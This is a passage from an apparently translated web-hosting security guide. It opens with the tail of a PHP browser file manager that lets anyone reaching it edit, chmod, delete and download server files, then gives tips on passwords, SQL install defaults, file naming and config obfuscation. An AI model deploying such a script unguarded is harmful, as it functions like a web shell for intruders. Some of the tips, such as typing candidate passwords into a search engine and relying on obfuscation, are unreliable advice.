<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">type</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">dir</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">name</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">path</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$dir</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">submit</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;/tr&gt;&quot;</span>;
	}
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;tr class=&quot;first&quot;&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&#39;</span>;
	<span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #19177C">$scandir</span> <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$file</span>) {
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #666666">!</span><span style="color: #008000">is_file</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">continue</span>;
		<span style="color: #19177C">$size</span> <span style="color: #666666">=</span> <span style="color: #008000">filesize</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>) <span style="color: #666666">/</span> <span style="color: #666666">1024</span>;
		<span style="color: #19177C">$size</span> <span style="color: #666666">=</span> round(<span style="color: #19177C">$size</span>, <span style="color: #666666">2</span>);
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$size</span> <span style="color: #666666">&gt;=</span> <span style="color: #666666">1024</span>) {
			<span style="color: #19177C">$size</span> <span style="color: #666666">=</span> round(<span style="color: #19177C">$size</span> <span style="color: #666666">/</span> <span style="color: #666666">1024</span>, <span style="color: #666666">2</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39; Mo&#39;</span>;
		}
		<span style="color: #008000; font-weight: bold">else</span> {
			<span style="color: #19177C">$size</span> <span style="color: #666666">=</span> <span style="color: #19177C">$size</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&#39; Ko&#39;</span>;
		}

		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;tr&gt;</span>
<span style="color: #BA2121">&lt;td&gt;&lt;a href=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">?filesrc=</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&amp;path=</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&lt;/a&gt;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">petit centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$size</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">petit centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">is_writable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #666666">!</span><span style="color: #008000">is_readable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">echo</span> perms(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>);
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">is_writable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>) <span style="color: #666666">||</span> <span style="color: #666666">!</span><span style="color: #008000">is_readable</span>(<span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BA2121">&quot;</span>)) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/font&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;td class=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">centre</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;form method=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">POST</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> action=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">?option&amp;path=</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">opt</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">What to do?</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;What to do?&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">rename</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Rename&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">edit</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Edit&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">move</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Move&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">chmod</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Chmod&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">zip</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Compress&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">unzip</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Uncompress&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">delete</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;Delete&lt;/option&gt;</span>
<span style="color: #BA2121">&lt;/select&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">type</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">file</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">name</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">hidden</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">path</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BB6688; font-weight: bold">$path</span><span style="color: #BA2121">/</span><span style="color: #BB6688; font-weight: bold">$file</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">submit</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&lt;/td&gt;</span>
<span style="color: #BA2121">&lt;/tr&gt;&quot;</span>;
	}
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/table&gt;</span>
<span style="color: #BA2121">&lt;/div&gt;&#39;</span>;
}
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;</span>
<span style="color: #BA2121">&lt;/body&gt;</span>
<span style="color: #BA2121">&lt;/html&gt;&#39;</span>;
<span style="color: #008000; font-weight: bold">function</span> <span style="color: #0000FF">perms</span>(<span style="color: #19177C">$file</span>) {
	<span style="color: #19177C">$perms</span> <span style="color: #666666">=</span> <span style="color: #008000">fileperms</span>(<span style="color: #19177C">$file</span>);

	<span style="color: #008000; font-weight: bold">if</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0xC000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0xC000</span>) {
		<span style="color: #408080; font-style: italic">// Socket</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;s&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0xA000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0xA000</span>) {
		<span style="color: #408080; font-style: italic">// Symbolic Link</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;l&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x8000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0x8000</span>) {
		<span style="color: #408080; font-style: italic">// Regular</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;-&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x6000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0x6000</span>) {
		<span style="color: #408080; font-style: italic">// Block special</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;b&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x4000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0x4000</span>) {
		<span style="color: #408080; font-style: italic">// Directory</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;d&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x2000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0x2000</span>) {
		<span style="color: #408080; font-style: italic">// Character special</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;c&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">elseif</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x1000</span>) <span style="color: #666666">==</span> <span style="color: #666666">0x1000</span>) {
		<span style="color: #408080; font-style: italic">// FIFO pipe</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;p&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">else</span> {
		<span style="color: #408080; font-style: italic">// Unknown</span>
		<span style="color: #19177C">$info</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&#39;u&#39;</span>;
	}

	<span style="color: #408080; font-style: italic">// Owner</span>
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0100</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;r&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0080</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;w&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0040</span>) <span style="color: #666666">?</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0800</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;s&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;x&#39;</span>) <span style="color: #666666">:</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0800</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;S&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>));

	<span style="color: #408080; font-style: italic">// Group</span>
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0020</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;r&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0010</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;w&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0008</span>) <span style="color: #666666">?</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0400</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;s&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;x&#39;</span>) <span style="color: #666666">:</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0400</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;S&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>));

	<span style="color: #408080; font-style: italic">// World</span>
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0004</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;r&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0002</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;w&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>);
	<span style="color: #19177C">$info</span> <span style="color: #666666">.=</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0001</span>) <span style="color: #666666">?</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0200</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;t&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;x&#39;</span>) <span style="color: #666666">:</span> ((<span style="color: #19177C">$perms</span> <span style="color: #666666">&amp;</span> <span style="color: #666666">0x0200</span>) <span style="color: #666666">?</span> <span style="color: #BA2121">&#39;T&#39;</span> <span style="color: #666666">:</span> <span style="color: #BA2121">&#39;-&#39;</span>));

	<span style="color: #008000; font-weight: bold">return</span> <span style="color: #19177C">$info</span>;
}
<span style="color: #008000; font-weight: bold">function</span> <span style="color: #0000FF">telFichBin</span>(<span style="color: #19177C">$telfich</span>){
	header(<span style="color: #BA2121">&#39;Content-Description: File Transfer&#39;</span>);
	header(<span style="color: #BA2121">&#39;Content-Type: application/octet-stream&#39;</span>);
	header(<span style="color: #BA2121">&#39;Content-Disposition: attachment; filename=&quot;&#39;</span><span style="color: #666666">.</span><span style="color: #008000">basename</span>(<span style="color: #19177C">$telfich</span>)<span style="color: #666666">.</span><span style="color: #BA2121">&#39;&quot;&#39;</span>);
	header(<span style="color: #BA2121">&#39;Expires: 0&#39;</span>);
	header(<span style="color: #BA2121">&#39;Cache-Control: must-revalidate&#39;</span>);
	header(<span style="color: #BA2121">&#39;Pragma: public&#39;</span>);
	header(<span style="color: #BA2121">&#39;Content-Length: &#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">filesize</span>(<span style="color: #19177C">$telfich</span>));
	<span style="color: #008000">ob_clean</span>();
	<span style="color: #008000">flush</span>();
	<span style="color: #008000">readfile</span>(<span style="color: #19177C">$telfich</span>);
	<span style="color: #008000; font-weight: bold">exit</span>;
}
<span style="color: #008000; font-weight: bold">function</span> <span style="color: #0000FF">cheminWeb</span>(<span style="color: #19177C">$fich</span>) {
  <span style="color: #19177C">$document_racine</span> <span style="color: #666666">=</span> <span style="color: #008000">rtrim</span>(<span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;#([</span><span style="color: #BB6622; font-weight: bold">\\\\</span><span style="color: #BA2121">/]+)#&quot;</span>, <span style="color: #BA2121">&#39;/&#39;</span>, <span style="color: #19177C">$_SERVER</span>[<span style="color: #BA2121">&#39;DOCUMENT_ROOT&#39;</span>]), <span style="color: #BA2121">&#39;/&#39;</span>);
  <span style="color: #19177C">$fich</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;#([</span><span style="color: #BB6622; font-weight: bold">\\\\</span><span style="color: #BA2121">/]+)#&quot;</span>, <span style="color: #BA2121">&#39;/&#39;</span>, <span style="color: #008000">realpath</span>(<span style="color: #19177C">$fich</span>));
  <span style="color: #008000; font-weight: bold">return</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;#^(</span><span style="color: #BB6688; font-weight: bold">$document_racine</span><span style="color: #BA2121">)#&quot;</span>, <span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$fich</span>);
}
<span style="color: #BC7A00">?&gt;</span>
</pre></div>

						<a id="motpasse"></a><hr><br>
						<header>
							<h2>Passwords</h2>
						</header>
						<p>Protect your passwords.<br>
						They can try to penetrate your hosting by guessing your FTP or SQL password. If you change the passwords, please respect the following rules:<br>
						<strong>1-</strong> A password must be at least 12 characters long, the longer the better.<br>
						<strong>2-</strong> It should never be a word found in the dictionary of any language. Password cracking software has dictionaries of hundreds of thousands of words of all languages and searches for all combinations. It takes from a few minutes to a few hours to crack these passwords very easily.<br>
						<strong>3-</strong> A good password contains upper- and lower-case letters, numbers and non-alphanumeric characters (such as punctuation marks).<br>
						<strong>4-</strong> <strong>NEVER USE THE SAME PASSWORD for FTP, SQL database, e-mail, website administration interface</strong>. The hacker <strong>KNOWS</strong> that if he finds your password, chances are it is the same password somewhere else. Many hosting providers offer a unique password to “simplify” the management.</p>
						<p>Some softwares create unique and random passwords and manage them for you (look at <a href="https://bitwarden.com">Bitwarden</a>, <a href="https://www.keepassx.org">KeepassX</a> and <a href="https://keepass.info">Keepass</a>, <a href="https://1password.com/">1Password</a>, <a href="https://www.dashlane.com/">Dashlane</a>, <a href="https://www.lastpass.com/fr">LastPass</a>…). That is the best solution because you don't have to memorize anything. <br>
						You can create this list yourself in a password-protected file and copy and paste the data for each login form. To simplify this task, you can also choose to trust your web browser to save your unique passwords, synchronize your data between your devices and fill in the form field for you each time you log in with the correct password. To generate these unique passwords, see for example these websites:<br>
						<a href="https://www.motdepasse.xyz">https://www.motdepasse.xyz</a><br>
						<a href="https://www.vpnmentor.com/tools/secure-password-generator/">https://www.vpnmentor.com/tools/secure-password-generator/</a><br>
						<a href="https://www.comparitech.com/privacy-security-tools/password-strength-test/">https://www.comparitech.com/privacy-security-tools/password-strength-test/</a></p> 
						<p> These websites offer phonetic passwords, creating words that are easy to remember:<br>
						<a href="https://www.dashlane.com/features/password-generator">https://www.dashlane.com/features/password-generator</a> (Dashlane)<br>
						<a href="https://www.lastpass.com/password-generator">https://www.lastpass.com/password-generator</a> (LastPass)<br>
						<a href="https://tools.arantius.com/password">https://tools.arantius.com/password</a></p>
						<p>To be sure that a memorable or phonetic password does not exist in any language, type it in part or in full in a search engine. If it returns no results, then your password is not a dictionary word.</p>
						<a id="installsql"></a><hr><br>
						<header>
							<h2>Installing an SQL database</h2>
						</header>
						<p>When you install your CMS, blog or e-commerce for the first time, it comes with default settings and parameters that we accept each time. In case of a flaw, the hacker can use these default settings and parameters to penetrate your SQL database and modify it.</p>
						<p>Here are a few tips to prevent this kind of SQL injection attack from being possible. There are several types of SQL injections. Rule 3 of .htaccess stops another form. Otherwise, the real protection against SQL injections is good coding.</p>
						<p><strong>1-</strong> When you install your CMS, blog or e-commerce, it provides the login “admin” and asks you to enter a password. If possible, change “admin” for something else, a nickname for example. A hacker knows that the default login is “admin” and will run his scripts only on the password. But if the login “admin” does not exist, he has no chance to penetrate the system.<br>
						Sometimes you have to make this modification in phpMyadmin. But be careful, you must be sure that it will not break your database. Ask the question on the editor's forum of your CMS, blog or e-commerce to find out if it is possible.</p>
						<p><strong>2-</strong> The first user is therefore the administrator and always has the ID 1. In the event that the login is not “admin”, some scripts may try to find out the password of user number 1, which is, in 99.99% of cases, the administrator. If possible, delete user number 1 on the list and be the administrator with the number 2 or 15 or 250.<br>
						Sometimes you have to make this modification in phpMyadmin. But be careful, you must be sure that it will not break your database. Ask the question on the editor's forum of your CMS, blog or e-commerce to find out if it is possible.</p>
						<p><strong>3-</strong> During installation, your CMS, blog or e-commerce asks you to choose a prefix for the table names. We always accept the default prefix as wp_ for Wordpress, g2_ for Gallery2, dc_ for DotClear, phpbb_ for phpBB, etc. The cracker can search the table with the list of users and their passwords. If, like everyone else, you have not changed the prefix, it will be easy for him to find the table. So, change the prefix of your SQL tables for more security. You can do this after installation. Sometimes it is necessary to do this modification in phpMyadmin. But be careful, you have to be sure that it won't break your database. Ask the question on the editor's forum of your CMS, blog or e-commerce to find out if it is possible.<br>
						For example, with Wordpress in the event you change the prefix after installation, you also need to change 2 entries in the database and in the wp-config.php file, see their forums to know how to do this.</p>
						<p><strong>My advice: <span style="color:#008080;">ALWAYS CHANGE THE DEFAULT SETTINGS!</span></strong></p>
						<a id="nommage"></a><hr><br>
						<header>
							<h2>File naming</h2>
						</header>
						<p>To prevent hacker bots from finding you through Google, change some habits, such as the name and URL of particular files.</p>
						<p>1- Do not call the contact form page: mail.php or contact.html. Call it something else with its equivalent in other languages. Spam robots will have more trouble finding a contact form to hack and send spam thanks to a flaw in your mail script.<br>
						Do the same thing with other files: no login.php, admin.php, download.php (they will look for the vulnerability to download a file out of its directory), etc. As a general rule, avoid these common English words.</p>
						<p>2- Spammers aren't idiots. Also change some of the names on the form. In the INPUT html tags, change the NAME attribute that contains words like “e-mail”, “mail”, “name” or “subject” by their counterpart in other languages. Make this change in the HTML form and in your php or cgi script.</p>
						<p>3- Avoid giving the name of your CMS, blog or e-commerce directly in the URL such as www.domain.tld/admin/ or www.domain.tld/login/ or www.domain.tld/blog/ or www.domain.tld/forum/ or www.domain.tld/shop/. Spammers and hackers look for these URLs to target for an attack. Be more creative for your security. The best is to avoid the English word and to prefer its equivalent in other languages.</p>
						<a id="cryptconfig"></a><hr><br>
						<header>
							<h2>Encrypt your config.inc.php file</h2>
						</header>
						<p>Despite all precautions, the hacker has penetrated your site and is now trying to find out the login and password of your MySQL database in order to hack it, empty it and take control of it. The hacker's task can be complicated by encrypting this sensitive data. The web server will be able to read this information easily, but it will not be readable directly by a human. <br>
						For a PHP expert, this protection only lasts 2 minutes, it makes him work harder, but we are not here to make it easier for him?</p>
						<p>Visit this website and encrypt your data. <br>
						<a href="http://www.phpencode.org">www.phpencode.org</a> or <a href="http://www.mobilefish.com/services/php_obfuscator/php_obfuscator.php">www.mobilefish.com/services/php_obfuscator/php_obfuscator.php</a> or look for a “PHP Obfuscator”.</p>
						<p>For example, my config.php file contains this:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #408080; font-style: italic">/* MySQL settings */</span>
<span style="color: #19177C">$db_server</span>   <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;serveursql&quot;</span>;
<span style="color: #19177C">$db_name</span>     <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;nombasesql&quot;</span>;
